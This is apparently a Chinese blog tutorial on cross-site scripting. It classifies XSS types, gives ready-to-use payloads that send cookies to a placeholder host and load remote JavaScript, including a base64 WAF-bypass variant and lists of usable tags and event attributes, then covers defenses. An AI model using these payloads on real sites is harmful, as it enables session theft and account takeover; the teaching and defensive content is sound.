XSS利用

最新推荐文章于 2024-06-12 10:55:23 发布
最新推荐文章于 2024-06-12 10:55:23 发布
阅读量291 收藏 1
点赞数 2
文章标签: javascript xss web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YIN_XIAOMAO/article/details/130722119
版权
文章详细介绍了XSS攻击的三种类型——反射型、存储型和DOM型,展示了如何利用XSS获取Cookie和加载远程JS文件,并探讨了编码绕过和WAF的限制。同时,提出了防御XSS的方法,如启用HTTPOnlyCookie,使用CSP以及Web流量检测。
摘要由CSDN通过智能技术生成

系列文章目录

XSS攻击

一、XSS是什么?

XSS的本质是浏览器执行了恶意js代码。

二、XSS分类

1.反射型XSS

需要受害者主动去点击存在XSS的恶意链接。是非持久的,一般场景危害性低(大流量页面除外)。

2.存储型XSS

恶意js代码存储在web服务器中,用户访问页面时会触发,持久化,危害性较高。

3.DOM型XSS

浏览器执行了恶意js代码,通过修改和获取Dom中的数据。

三、XSS利用

XSS利用文章很多,不再重复,这里主要是利用XSS获取用户敏感信息和加载远程文件。

获取Cookie
<script>document.location="http://ip:port/cookie?cookie="+document.cookie</script>
加载远程js文件
<script src="http://ip:port/xsstools/myjs/ceshi.js"></script>
<svg onmouseover="$.getScript`https://ip:port/xssools/myjs/ceshi.js`" stype="display:none">
<img src="1" onerror="s=createElement('script');body.appendChild(s);s.src='//ip:port/xsstools/myjs/ceshi.js'">
编码绕过

大小写绕过基本都会被WAF拦截,可以使用编码。

base64
<object data="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9pcDpwb3J0L3hzc3Rvb2xzL215anMvY2VzaGkuanMiPjwvc2NyaXB0Pg=="></object>
可加载远程文件的标签和属性
标签

svg|script|input|p|div|link|button|details|img|object|iframe|a|body|bgsound|br|style|mate|table|div|base

属性

FSCommand|onAbort|onActivate|onAfterPrint|onAfterUpdate|onBeforeActivate|onBeforeCopy|onBeforeCut|onBeforeDeactivate|onBeforeEditFocus|onBeforePaste|onBeforePrint|onBeforeUnload|onBeforeUpdate|onBegin|onBlur|onBounce|onCellChange|onChange|onClick|onContextMenu|onControlSelect|onCopy|onCut|onDataAvailable|onDataSetChanged|onDataSetComplete|onDblClick|onDeactivate|onDrag|onDragEnd|onDragLeave|onDragEnter|onDragOver|onDragDrop|onDragStart|onDrop|onEnded|onError|onErrorUpdate|onFilterChange|onFinish|onFocus|onFocusIn|onFocusOut|onHashChange|onHelp|onInput|onKeyDown|onKeyPress|onKeyUp|onLayoutComplete|onLoad|onLoseCapture|onMediaComplete|onMediaError|onMessage|onMouseDown|onMouseEnter|onMouseLeave|onMouseMove|onMouseOut|onMouseOver|onMouseUp|onMouseWheel|onMove|onMoveEnd|onMoveStart|onOffline|onOnline|onOutOfSync|onPaste|onPause|onPopState|onProgress|onPropertyChange|onReadyStateChange|onRedo|onRepeat|onReset|onResize|onResizeEnd|onResizeStart|onResume|onReverse|onRowsEnter|onRowExit|onRowDelete|onRowInserted|onScroll|onSeek|onSelect|onSelectionChange|onSelectStart|onStart|onStop|onStorage|onSyncRestored|onSubmit|onTimeError|onTrackChange|onUndo|onUnload|onURLFlip|seekSegmentTim

四、XSS防御

开发阶段
  • 开启Http only.
  • 通过CSP限制恶意js执行。
  • 永远不要相信外部输入,对输入进行编码。
  • 遵循安全开发规范,不使用危险函数。
web流量检测
  • WAF
    直接检测拦截请求中函数
  • 关联检测
    WAF限制于性能和功能大部分为单包检测,XSS检测误报或漏报较高,可以采集web流量进行旁路检测,关联请求响应,有条件还可以关联dnslog日志等进行检测。
    在这里插入图片描述

总结

XSS利用方式较多,多研究总有一个适合你,
XSS防御方式较多,多种方式联动防御才好。

Y_kitten
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS总结
weixin_51356351的博客
11-19 1510
xss理解 1、简介 xss(cross site script)跨站脚本攻击,为了避免与css混淆,所以简称为xss。 2、什么是xss xss全称叫跨站脚本攻击,因为应用使用了js框架,因为应用未做任何防御措施,导致了攻击者使用对应的payload进行攻击,受害者运行了攻击者的payload,将攻击者所需的cookie发送给了攻击者,最本质的是服务器并没有完全过滤客户端提交的数据 3、xss的危害大吗? 答:很大,是现在web中主流的攻击方式。 4、xss攻击都可以导致哪些危害 (1)钓鱼欺骗 (2)网
XSS利用文档
05-23
跨站脚本(Cross-Site Scripting,简称XSS)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本。这种攻击通常发生在Web应用...通过深入研究和学习XSS利用文档,我们可以更好地理解和应对这一威胁。
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4052
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS漏洞利用方式总结
XunanSec的博客
05-21 4821
前言: 最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。 00×1什么是XSS漏洞: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​ 00×2 XSS漏洞有什么危害: 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 ...
【网络安全XSS漏洞- XSS基础概述及利用
最新发布
goldfish8848的博客
06-12 1197
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
XSS漏洞的利用
LizePing_的博客
07-29 4758
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用最常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
XSS详解及其利用方式
读书 买花 长大
11-14 3953
XSS-xss
XSS漏洞原理和利用
热门推荐
VictorZhang
08-09 1万+
XSS漏洞原理和利用 1.XSS介绍及原理 XSS又叫CSS(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往Web页面 里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而 达到恶意的特殊目的。 利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行, 访问该页面的用户则被攻击。 XSS漏洞分类 1.反射型 非存储型...
xss利用于挖掘
08-17
### XSS(跨站脚本)攻击利用与挖掘详解 #### XSS攻击概述 XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web应用安全漏洞。它允许攻击者在受害者的浏览器上注入恶意脚本,从而进行一系列攻击行为,如...
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
本文将详细讲解XSS利用方法以及挖掘技巧,基于"XSS利用与挖掘-_更新版.pptx"这份资料,我们将深入探讨这一主题。** 首先,我们需要理解XSS的三种主要类型:反射型XSS、存储型XSS和DOM型XSS。 1. **反射型XSS**:...
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
04-07
PDF-XSS实例文件
第十二节 利用IE特性绕过XSS过滤-01
09-15
在本节课程中,我们将讨论如何利用 IE 特性绕过 XSS 过滤,并对应不同的 XSS 攻击场景,包括 XSS 漏洞发现、基本 XSS 利用、IE 特性讲解和 Payload 触发 XSSXSS 漏洞发现 XSS 漏洞发现是指在目标网站中查找可能...
XSS漏洞利用方式汇总
Kevin's Blog
05-04 1万+
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
教大家如何找XSS漏洞并且利用
liuhyusb的博客
06-19 1612
cross sitescript跨站脚本攻击,为了避免和css重复,就叫XSS了,是客户端脚本安全中的头号大敌。
挖洞经验 | 可以被XSS利用的HTML标签和一些手段技巧,靠挖SRC漏洞每月多赚15k
jennycisp的博客
10-26 816
*”。**网上关于XSS的教程数不胜数,转载来转载去的,就是那么些Payload,可能看的人晕晕的不知所以然。而且还有很多Payload就算把其中的HTML代码闭合后写在自己的前端中,都不一定触发,因为很多老的标签和事件都已经被W3C给废弃了。本文首先给大家总结一下目前通用可以拿来构造XSS的HTML标签和一些标签事件,然后再给大家讲述一些绕过的技巧,教你在么构造出属于你自己渗透时真正需要的Exp。
XSS漏洞初步学习、深度利用
m0_55313512的博客
03-03 2346
XSS漏洞
xss原理及利用
MAPLE102424的博客
05-12 1387
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
XSS漏洞检测和利用
2401_84434570的博客
04-22 914
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞。
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)
网络安全领域___专研者.
03-18 4107
XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
XSS漏洞利用深度解析
"xss利用与挖掘" XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上注入恶意脚本。通过XSS攻击,攻击者能够窃取用户的敏感信息,如cookies,或者控制用户的浏览器行为,例如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值